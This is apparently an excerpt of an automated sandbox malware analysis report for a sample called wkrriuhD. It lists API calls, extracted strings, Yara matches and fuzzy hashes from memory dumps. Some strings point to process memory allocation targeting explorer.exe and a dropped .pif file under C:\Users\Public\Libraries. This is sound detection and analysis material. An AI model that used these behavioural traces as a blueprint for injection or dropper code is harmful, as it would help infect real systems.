                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404685
                                                                                                                                                                                          • tgtTypPtr != 0 && IS_STRUC(tgtTypPtr->tpMask), xrefs: 004046B0
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 004046AB
                                                                                                                                                                                          • srcTypPtr, xrefs: 00404838
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$__isSameTypeID(srcTypPtr, tgtTypPtr) == 0$srcTypPtr$srcTypPtr == 0 || IS_STRUC(srcTypPtr->tpMask)$tgtTypPtr != 0 && IS_STRUC(tgtTypPtr->tpMask)$tgtTypPtr != 0 && __isSameTypeID(topTypPtr, tgtTypPtr) == 0$topTypPtr != 0 && IS_STRUC(topTypPtr->tpMask)
                                                                                                                                                                                          • API String ID: 0-2396967825
                                                                                                                                                                                          • Opcode ID: d7648ce6212e0e930c1cc39aa32bab138302b09c43c6609dbc5e6efde8939b29
                                                                                                                                                                                          • Instruction ID: 5efc0c11aba9b44eb1f17c95100801df8ae742c1086434eea204630fcc019830
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7648ce6212e0e930c1cc39aa32bab138302b09c43c6609dbc5e6efde8939b29
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3171C3B1900209ABDF14DE51CC05BAE77A0AF85714F18C83AFE04362D1E37DD960CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 146459EA
  • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
  • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
• _free.LIBCMT ref: 146459F6
• _free.LIBCMT ref: 14645A01
• _free.LIBCMT ref: 14645A0C
• _free.LIBCMT ref: 14645A17
• _free.LIBCMT ref: 14645A22
• _free.LIBCMT ref: 14645A2D
• _free.LIBCMT ref: 14645A38
• _free.LIBCMT ref: 14645A43
• _free.LIBCMT ref: 14645A51
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8ac2d5dd06e36378d5b92045dbadc96f3a9d6212446015558d2e8fbc73201920
• Instruction ID: bd5d784e7d600cd237e32240a1878eab085a2cfc2f89391d0122f83ac822fb98
• Opcode Fuzzy Hash: 8ac2d5dd06e36378d5b92045dbadc96f3a9d6212446015558d2e8fbc73201920
• Instruction Fuzzy Hash: F811B67E521148FFDF12DF94C851CDD3FA5EF14254B6940A1BE088FA21DA31EA509B88
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
• Instruction ID: 308c53ad1c5e73ca6c646b3dbd44d380b3cbbba384f78a6a592c14978dcd2068
• Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
• Instruction Fuzzy Hash: A5118376504249EFCB11EF58D846E9D3F65FF48750F4180A2B9088B362EA31EA50DF45
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 12378135
                                                                                                                                                                                            • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
                                                                                                                                                                                            • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
                                                                                                                                                                                          • _free.LIBCMT ref: 12378141
                                                                                                                                                                                          • _free.LIBCMT ref: 1237814C
                                                                                                                                                                                          • _free.LIBCMT ref: 12378157
                                                                                                                                                                                          • _free.LIBCMT ref: 12378162
                                                                                                                                                                                          • _free.LIBCMT ref: 1237816D
                                                                                                                                                                                          • _free.LIBCMT ref: 12378178
                                                                                                                                                                                          • _free.LIBCMT ref: 12378183
                                                                                                                                                                                          • _free.LIBCMT ref: 1237818E
                                                                                                                                                                                          • _free.LIBCMT ref: 1237819C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 05151cddc642ddb4060c39c8e7bca3567e4bb83e58adb1e4543c5c71d08d0bff
                                                                                                                                                                                          • Instruction ID: dc68d0fea0cc576aea496fa1c79adfc400cbba9c95e29850624141d54f769a65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05151cddc642ddb4060c39c8e7bca3567e4bb83e58adb1e4543c5c71d08d0bff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C11C07E100149AFCF91DF94C850CE93BA5BF08395B0191A4BA588F220DA36EF50AFC0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005964C8
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00596505
                                                                                                                                                                                            • Part of subcall function 005C5552: __onexit.LIBCMT ref: 005C5558
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer$__onexit
• String ID: 0lG$0lG$0lG$0lG$0lG$kG
• API String ID: 1878262506-4252883706
• Opcode ID: 9fceeccbbb7e863caeab5f8b3b560d4f3a4196f7e6888d4732fdfa0b1817e938
• Instruction ID: f6284b5ce304fd04e7517805141018cab5c4313745c9e26dd1126a62d280b0cc
• Opcode Fuzzy Hash: 9fceeccbbb7e863caeab5f8b3b560d4f3a4196f7e6888d4732fdfa0b1817e938
• Instruction Fuzzy Hash: A691C371604605BFDB11BF74AD46E6E3E9EFB80300F01443EF98D961A2DF299C488B69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B868: EnterCriticalSection.KERNEL32(0041048C,?,004056B8,?,creating stream lock,?,?,?,00405450,?,?,?,?,?,00404F7B,?), ref: 0040B870
  • Part of subcall function 0040B868: InitializeCriticalSection.KERNEL32(?,0041048C,?,004056B8,?,creating stream lock,?,?,?,00405450,?,?,?,?,?,00404F7B), ref: 0040B89E
  • Part of subcall function 0040B868: LeaveCriticalSection.KERNEL32(0041048C,?,0041048C,?,004056B8,?,creating stream lock,?,?,?,00405450,?,?,?,?), ref: 0040B8C5
• SetHandleCount.KERNEL32(00000032), ref: 004065D2
• GetStartupInfoA.KERNEL32(?), ref: 004065FC
• GetStdHandle.KERNEL32(000000F6), ref: 004066B5
• GetStdHandle.KERNEL32(000000F5,000000F6), ref: 004066C1
• GetStdHandle.KERNEL32(000000F4,000000F5,000000F6), ref: 004066CD
Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: Handle$CriticalSection$CountEnterInfoInitializeLeaveStartup
• String ID: D@$D@$creating global handle lock
• API String ID: 3255421519-3519871622
• Opcode ID: 822bb4a5261f8c7165ddfbd27327c476d3e5637e78d8e88fa555a43e3e4aef86
• Instruction ID: 91436c65d83507411f26f5c3f9f24484589e4f2abe2935dbc4f524b2f6f24ae6
• Opcode Fuzzy Hash: 822bb4a5261f8c7165ddfbd27327c476d3e5637e78d8e88fa555a43e3e4aef86
• Instruction Fuzzy Hash: A331E5B19002019BD714DF25DCC1B6AB7A0EB40324F254E3EEA87A72D0D77E9865CB5E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(123A2B14,00000000,123A52D8,00003000,00000004,00000000,00000001), ref: 123373DD
• GetCurrentProcess.KERNEL32(123A2B14,00000000,00008000,?,00000000,00000001,00000000,12337656,C:\Users\Public\Libraries\wkrriuhD.pif), ref: 1233749E
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• API String ID: 2050909247-4242073005
• Opcode ID: 4401eb0e7e7426f96ee5cc72ef298f5cc5a17e02a92be0572fde898b1c536244
• Instruction ID: 951722ec450979c9b153bf9a03204c24ad873d57f9cc1295d4b3f25c7be42af5
• Opcode Fuzzy Hash: 4401eb0e7e7426f96ee5cc72ef298f5cc5a17e02a92be0572fde898b1c536244
• Instruction Fuzzy Hash: E731A3B7691229AFE767DF64CC84FA67BACBB84312F014C28F516D6640DB34E904CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: {-Y
• API String ID: 269201875-2507730204
• Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction ID: 2fee319059b7ab244e53d3b67284b5e75d420872032dacf75444ff7de35a4a86
• Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction Fuzzy Hash: 34116D31551B49AAD630F7B1CC0BFDB7FDCBF89700F400826B2D96A252DA34A644C695
Uniqueness

Uniqueness Score: -1.00%

APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 14641D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D8A
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: 9869b0d0aaa9c46e106d9ffd15a8df126736e3dce1245f641c75ae9012a5b3f7
• Instruction ID: a1b08abbf9d977296a70e635b11dac367414d8a98d004cafa841defc7f987acf
• Opcode Fuzzy Hash: 9869b0d0aaa9c46e106d9ffd15a8df126736e3dce1245f641c75ae9012a5b3f7
• Instruction Fuzzy Hash: 7E214CB5E0122CAFEF209FA09CCCEEA76ACEB2864CF180569F515D3140D6709E468A70
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID: +$-$0$9$A$F$I$N$N$N
• API String ID: 0-1648577461
• Opcode ID: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
• Instruction ID: 1cb875950997489b1ee042daea32ef314182afe9941b1639f7d9611703f458e9
• Opcode Fuzzy Hash: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
• Instruction Fuzzy Hash: A6E18175D042499BCF20CFA4CA846EEBBB1AF58310F24817FD894B7391DB398A41CB59
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID: +$-$0$9$A$F$I$N$N$N
• API String ID: 0-1648577461
• Opcode ID: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
• Instruction ID: fdd31973b3b99697ec39bc4d4de6dc45345fe78665f93d75c906704075768b3a
• Opcode Fuzzy Hash: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
• Instruction Fuzzy Hash: 0AE17D70E05249DBDF14DFA4C6842EEBBB1AF58300F24817BE894B7391DB395A41CB69
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"what?"$!"what?"$(ctorMask & 0x0080) == 0$(ctorMask & 0x0100) != 0 || (ctorMask & 0x0020) == 0$XX.CPP$XX.CPP$XX.CPP$XX.CPP$what?$what?
                                                                                                                                                                                          • API String ID: 0-2639688565
                                                                                                                                                                                          • Opcode ID: fd697a23a8341155eeb8432b0f92f72cb662826ad4f5abca942cfff930da084f
                                                                                                                                                                                          • Instruction ID: f60a34a71469ba83e7833d9ec68331f2d83224e98db52aa81e8652658bfbd3b2
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd697a23a8341155eeb8432b0f92f72cb662826ad4f5abca942cfff930da084f
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE21B431744345A7EA242E658F4EF6F2564AF95B01F680533FD01722C0E6FD4A15D16F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dtrCount <= vdtCount$etdCount <= elemCount || elemCount == 0$varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpMask & TM_IS_ARRAY$vdtCount
                                                                                                                                                                                          • API String ID: 0-399877090
                                                                                                                                                                                          • Opcode ID: fe4e1fff7598651d3aff739946f9fed268690cd354c9be1bb4bbca50bd1de878
                                                                                                                                                                                          • Instruction ID: 88776ef7a22d3ae589bf471a2eb8d12af5e4a32f205574c383fb24602ad5b1ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe4e1fff7598651d3aff739946f9fed268690cd354c9be1bb4bbca50bd1de878
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52313532A00308ABEF00DF55CC8AF9E7B74AF54714F14457BFD043A2C2D3B9AA608699
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __allrem.LIBCMT ref: 005CBA4B
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005CBA67
                                                                                                                                                                                          • __allrem.LIBCMT ref: 005CBA7E
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005CBA9C
                                                                                                                                                                                          • __allrem.LIBCMT ref: 005CBAB3
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005CBAD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID: "+Y
                                                                                                                                                                                          • API String ID: 1992179935-2689556389
                                                                                                                                                                                          • Opcode ID: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
                                                                                                                                                                                          • Instruction ID: 0a0f7aa9fb5d4dec07a4055d33c61d7b494f65cbfcbcf32f0bf62866a2a3ffcb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6181F572A007069FF7249EADDC87F6A7BA8BF80720F24462EF591D6681EB70DD008751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$_abort_memcmp
                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                          • API String ID: 137591632-1037565863
                                                                                                                                                                                          • Opcode ID: 0768c3d9e3dd940518f99a63cbcd3aeb961d046fc1a72f364ae26972a0ea9dca
                                                                                                                                                                                          • Instruction ID: 9b63afcefe52b7c6e09b9388c9fccae217bf7b90bead462e0a215c855eca1371
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0768c3d9e3dd940518f99a63cbcd3aeb961d046fc1a72f364ae26972a0ea9dca
                                                                                                                                                                                          • Instruction Fuzzy Hash: EDB11775A0161ADBDB34DF18C888AADBBB4FF58304F1045ABE949A7351E731AE91CF40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12378215: GetLastError.KERNEL32(00000020,?,1236A7F5,?,?,?,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B), ref: 12378219
                                                                                                                                                                                            • Part of subcall function 12378215: _free.LIBCMT ref: 1237824C
                                                                                                                                                                                            • Part of subcall function 12378215: SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 1237828D
                                                                                                                                                                                            • Part of subcall function 12378215: _abort.LIBCMT ref: 12378293
                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 12375423
                                                                                                                                                                                          • _free.LIBCMT ref: 12375494
                                                                                                                                                                                          • _free.LIBCMT ref: 123754AD
                                                                                                                                                                                          • _free.LIBCMT ref: 123754DF
                                                                                                                                                                                          • _free.LIBCMT ref: 123754E8
                                                                                                                                                                                          • _free.LIBCMT ref: 123754F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                          • API String ID: 1679612858-1037565863
                                                                                                                                                                                          • Opcode ID: b8d4cb05f274ddc4f0e0af1d66be1e6ec7ecb9a625997558cd0ce1604b71a21a
                                                                                                                                                                                          • Instruction ID: f2eb1e9af7e1d8446882ba466fed14e285c4bbcf9845f830196d32b3076bf74f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b8d4cb05f274ddc4f0e0af1d66be1e6ec7ecb9a625997558cd0ce1604b71a21a
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB12B76A0125A9FDB68CF18D884B9DB7B4FB48315F5046AAD849A7390D734AE90CF40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: 6$8+G$8+G$hdF
                                                                                                                                                                                          • API String ID: 176396367-3129652869
                                                                                                                                                                                          • Opcode ID: 1a9c3962d4051c0992c0d3c4f02e65f90ab46b8a23f48d03cfd53388f795b238
                                                                                                                                                                                          • Instruction ID: b71f7663356fb884b06fe0b566758d46698ad801881381fa1b07abe6dae33a95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a9c3962d4051c0992c0d3c4f02e65f90ab46b8a23f48d03cfd53388f795b238
                                                                                                                                                                                          • Instruction Fuzzy Hash: B151D3602583027BDF18BB749C5AA7F7F5DBFC5740F50482DF50A8A2D3DE589C05826A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __dosmaperr$_free
• String ID: 7+Y$7+Y
• API String ID: 242264518-3262366632
• Opcode ID: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
• Instruction ID: 89d7eb6f882288c412db53f1662fae1904c61ba094d83b562a7855655f9e5cb3
• Opcode Fuzzy Hash: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
• Instruction Fuzzy Hash: 3931527140420AFFAF119FE4DC4AEAE3F68FF84365F14055AB91056261DB31CD50DB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• @__lockDebuggerData$qv.WKRRIUHD ref: 004027A1
• @__unlockDebuggerData$qv.WKRRIUHD ref: 0040283A
Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: Data$qvDebugger$@__lock@__unlock
• String ID: !"what?"$(dtorMask & 0x0080) == 0$XX.CPP$XX.CPP$what?
• API String ID: 2914929783-621719939
• Opcode ID: 865139f3765ff48def8f5fd269b067827c3e68def8ea50f292f22f230bfb78c8
• Instruction ID: b45044af56e270cf8ed87f5c96a059d71ef36e35bb8c0356fb506efd44f4e8ed
• Opcode Fuzzy Hash: 865139f3765ff48def8f5fd269b067827c3e68def8ea50f292f22f230bfb78c8
• Instruction Fuzzy Hash: E8311535604244DBD714AF56D94EBAA3B64AF00308F14827BF9493B6E2C7B9CC81DA99
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 12379212
• _free.LIBCMT ref: 12379236
• _free.LIBCMT ref: 123793BD
